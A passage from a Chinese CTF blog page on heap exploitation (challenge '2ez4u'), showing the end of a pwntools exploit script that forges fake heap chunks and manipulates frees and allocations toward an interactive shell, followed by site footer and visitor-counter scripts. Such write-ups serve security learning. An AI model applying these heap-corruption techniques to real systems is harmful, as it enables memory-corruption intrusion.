class="line">target_ad = heap_ad + <span class="number">0xb0</span></span><br><span class="line">chunk1_ad = heap_ad + <span class="number">0x130</span></span><br><span class="line">chunk2_ad = heap_ad + <span class="number">0x1b0</span></span><br><span class="line">victim_ad = heap_ad + <span class="number">0xc30</span></span><br><span class="line">edit(<span class="number">11</span>,p64(chunk1_ad))</span><br><span class="line">edit(<span class="number">1</span>,p64(<span class="number">0</span>)+p64(chunk1_ad))</span><br><span class="line">chunk2 = p64(<span class="number">0</span>)</span><br><span class="line">chunk2 += p64(<span class="number">0</span>)</span><br><span class="line">chunk2 += p64(<span class="number">0x421</span>)</span><br><span class="line">chunk2 += p64(<span class="number">0</span>)</span><br><span class="line">chunk2 += p64(<span class="number">0</span>)</span><br><span class="line">chunk2 += p64(chunk1_ad)</span><br><span class="line">edit(<span class="number">0x3</span>,chunk2)</span><br><span class="line">chunk1 = p64(<span class="number">0</span>)</span><br><span class="line">chunk1 += p64(<span class="number">0</span>)</span><br><span class="line">chunk1 += p64(<span class="number">0x411</span>)</span><br><span class="line">chunk1 += p64(target_ad - <span class="number">0x18</span>)</span><br><span class="line">chunk1 += p64(target_ad - <span class="number">0x10</span>)</span><br><span class="line">chunk1 += p64(victim_ad)</span><br><span class="line">chunk1 += p64(chunk2_ad)</span><br><span class="line">edit(<span class="number">2</span>,chunk1)</span><br><span class="line">edit(<span class="number">7</span>,<span class="string">&quot;7&quot;</span>*<span class="number">0x198</span>+p64(<span class="number">0x410</span>)+p64(<span class="number">0x411</span>))</span><br><span class="line">free(<span class="number">6</span>)</span><br><span class="line">free(<span class="number">3</span>)</span><br><span class="line">add(<span class="number">0x3f0</span>,<span class="string">&quot;3&quot;</span>*<span class="number">0x30</span> + p64(<span class="number">0xdeadbeefdeadbeef</span>))</span><br><span class="line">add(<span class="number">0x60</span>,<span class="string">&quot;b&quot;</span>*<span class="number">0x60</span>)</span><br><span class="line">debug()</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/%E5%A0%86/" rel="tag"># 堆</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2021/08/21/%E7%A5%A5%E4%BA%91%E6%9D%AF%E5%A4%8D%E7%8E%B0/" rel="next" title="祥云杯复现">
                <i class="fa fa-chevron-left"></i> 祥云杯复现
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2021/09/12/week7/" rel="prev" title="week7">
                week7 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image"
                src="/images/avatar.gif"
                alt="" />
            
              <p class="site-author-name" itemprop="name"></p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives">
              
                  <span class="site-state-item-count">22</span>
                  <span class="site-state-item-name">posts</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">15</span>
                  <span class="site-state-item-name">categories</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">14</span>
                  <span class="site-state-item-name">tags</span>
                </a>
              </div>
            

          </nav>

          
            <div class="feed-link motion-element">
              <a href="/atom.xml" rel="alternate">
                <i class="fa fa-rss"></i>
                RSS
              </a>
            </div>
          

          

          
          

          
          
            <div class="links-of-blogroll motion-element links-of-blogroll-block">
              <div class="links-of-blogroll-title">
                <i class="fa  fa-fw fa-link"></i>
                友情链接
              </div>
              <ul class="links-of-blogroll-list">
                
                  <li class="links-of-blogroll-item">
                    <a href="https://xiquanmuhua.github.io/" title="muhua" target="_blank">muhua</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://tianmai1.github.io/" title="tianmai" target="_blank">tianmai</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://makabaka-yyds.github.io/" title="makabaka" target="_blank">makabaka</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://lucifer-rossweisse.github.io/" title="Rossweisse" target="_blank">Rossweisse</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://lemonprefect.cn/" title="lemon" target="_blank">lemon</a>
                  </li>
                
              </ul>
            </div>
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E4%BE%8B%E9%A2%981-2ez4u"><span class="nav-number">1.</span> <span class="nav-text">例题1.2ez4u</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E7%AC%AC%E4%B8%80%E9%83%A8%E5%88%86"><span class="nav-number">1.1.</span> <span class="nav-text">第一部分</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E7%AC%AC%E4%BA%8C%E9%83%A8%E5%88%86"><span class="nav-number">1.2.</span> <span class="nav-text">第二部分</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E7%AC%AC%E4%B8%89%E9%83%A8%E5%88%86"><span class="nav-number">1.3.</span> <span class="nav-text">第三部分</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E7%AC%AC%E5%9B%9B%E9%83%A8%E5%88%86"><span class="nav-number">1.4.</span> <span class="nav-text">第四部分</span></a></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Archer</span>

  
</div>


  <div class="powered-by">Powered by <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a></div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">Theme &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Gemini</a> v5.1.4</div>



<div class="theme-info">
  Theme -
  <a class="theme-link" rel="external nofollow noopener" target="_blank" href="https://github.com/iissnan/hexo-theme-next">
    NexT.Gemini
  </a>
**  <span id="busuanzi_container_site_pv" class="theme-info">
&nbsp;&nbsp;|&nbsp;&nbsp;本站总访问量<span id="busuanzi_value_site_pv"></span>次
  </span>
  <span id="busuanzi_container_site_uv" class="theme-info">
&nbsp;&nbsp;|&nbsp;&nbsp;本站访客数<span id="busuanzi_value_site_uv"></span>人次
  </span>
**
</div>
        
<div class="busuanzi-count">
  <script async src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>

  
    <span class="site-uv">
      <i class="fa fa-user"></i>
      <span class="busuanzi-value" id="busuanzi_value_site_uv"></span>
      
    </span>
  

  
    <span class="site-pv">
      <i class="fa fa-eye"></i>
      <span class="busuanzi-value" id="busuanzi_value_site_pv"></span>
      
    </span>
  
</div>








        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  
  <script src="https://cdn1.lncld.net/static/js/av-core-mini-0.6.4.js"></script>
  <script>AV.initialize("LbPELecNVT4mCuCTYHSU2wzm-gzGzoHsz", "iRokzKJjxE22Vs6iknD1dqGA");</script>
  <script>
    function showTime(Counter) {
      var query = new AV.Query(Counter);
      var entries = [];
      var $visitors = $(".leancloud_visitors");

      $visitors.each(function () {
        entries.push( $(this).attr("id").trim() );
      });

      query.containedIn('url', entries);
      query.find()
        .done(function (results) {
          var COUNT_CONTAINER_REF = '.leancloud-visitors-count';

          if (results.length === 0) {
            $visitors.find(COUNT_CONTAINER_REF).text(0);
            return;
          }

          for (var i = 0; i < results.length; i++) {
            var item = results[i];
            var url = item.get('url');
            var time = item.get('time');
            var element = document.getElementById(url);

            $(element).find(COUNT_CONTAINER_REF).text(time);
          }
          for(var i = 0; i < entries.length; i++) {
            var url = entries[i];
            var element = document.getElementById(url);
            var countSpan = $(element).find(COUNT_CONTAINER_REF);
            if( countSpan.text() == '') {
              countSpan.text(0);
            }
          }
        })
        .fail(function (object, error) {
          console.log("Error: " + error.code + " " + error.message);
        });
    }

    function addCount(Counter) {
      var $visitors = $(".leancloud_visitors");
      var url = $visitors.attr('id').trim();
      var title = $visitors.attr('data-flag-title').trim();
      var query = new AV.Query(Counter);

      query.equalTo("url", url);
      query.find({
        success: function(results) {
          if (results.length > 0) {
            var counter = results[0];
            counter.fetchWhenSave(true);
            counter.increment("time");
            counter.save(null, {
              success: function(counter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(counter.get('time'));
              },
              error: function(counter, error) {
                console.log('Failed to save Visitor num, with error message: ' + error.message);
              }
            });
          } else {
            var newcounter = new Counter();
            /* Set ACL */
            var acl = new AV.ACL();
            acl.setPublicReadAccess(true);
            acl.setPublicWriteAccess(true);
            newcounter.setACL(acl);
            /* End Set ACL */
            newcounter.set("title", title);
            newcounter.set("url", url);
            newcounter.set("time", 1);
            newcounter.save(null, {
              success: function(newcounter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(newcounter.get('time'));
              },
              error: function(newcounter, error) {
                console.log('Failed to create');
              }
            });
          }
        },
        error: function(error) {
          console.log('Error:' + error.code + " " + error.message);
        }
      });
    }

    $(function() {
      var Counter = AV.Object.extend("Counter");
      if ($('.leancloud_visitors').length == 1) {
        addCount(Counter);
      } else if ($('.post-title-link').length > 1) {
        showTime(Counter);
      }
    });
  </script>



  

  

  
  

  

  

  

</body>
</html>
